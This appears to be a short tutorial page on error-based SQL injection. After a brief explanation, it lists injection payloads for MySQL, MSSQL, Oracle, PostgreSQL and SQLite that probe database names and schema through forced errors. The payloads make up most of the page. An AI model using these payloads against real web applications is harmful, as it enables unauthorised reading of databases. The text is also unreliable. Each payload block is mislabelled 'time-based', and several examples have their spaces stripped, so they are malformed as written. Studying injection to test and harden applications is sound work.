Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.
Practice
The process is relatively the same as Boolean Based injection. All you have to do is modify the payloads to trigger an error wait.
A time-based SQLi payload in MySQL will look like this
1' SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')--
Examples:
#Boolean Based 1' AND (SELECT LENGTH(database()))=1-- -#Error Based 1'SELECTIF((SELECT LENGTH(database()))=1,(SELECTtable_nameFROMinformation_schema.tables),'a')--
A time-based SQLi payload in MSSQL will look like this
1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END--
Examples:
#Boolean Based 1' AND (SELECT LEN(DB_NAME()))=1--#Error Based 1'; SELECTCASEWHEN ((SELECT LEN(DB_NAME()))=1) THEN 1/0 ELSE NULL END--
A time-based SQLi payload in OracleSQL will look like this
1' || SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual ||--
Examples:
#Boolean Based 1' AND (SELECT LENGTH(global_name) FROM global_name)=1--#Error Based 1'||SELECTCASEWHEN ((SELECT LENGTH(global_name) FROMglobal_name)=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual ||--
A time-based SQLi payload in PostgreSQL will look like this
1' AND 1 = CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END--
Examples:
#Boolean Based 1' AND (SELECT LENGTH(current_database()))=1--#Error Based 1'AND1=CASEWHEN ((SELECT LENGTH(current_database()))=1) THEN 1/(SELECT0) ELSE NULL END--
A time-based SQLi payload in SQLite will look like this
1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE load_extension(1) END--
Examples:
#Boolean Based 1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--
#Error Based 1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE load_extension(1) END--
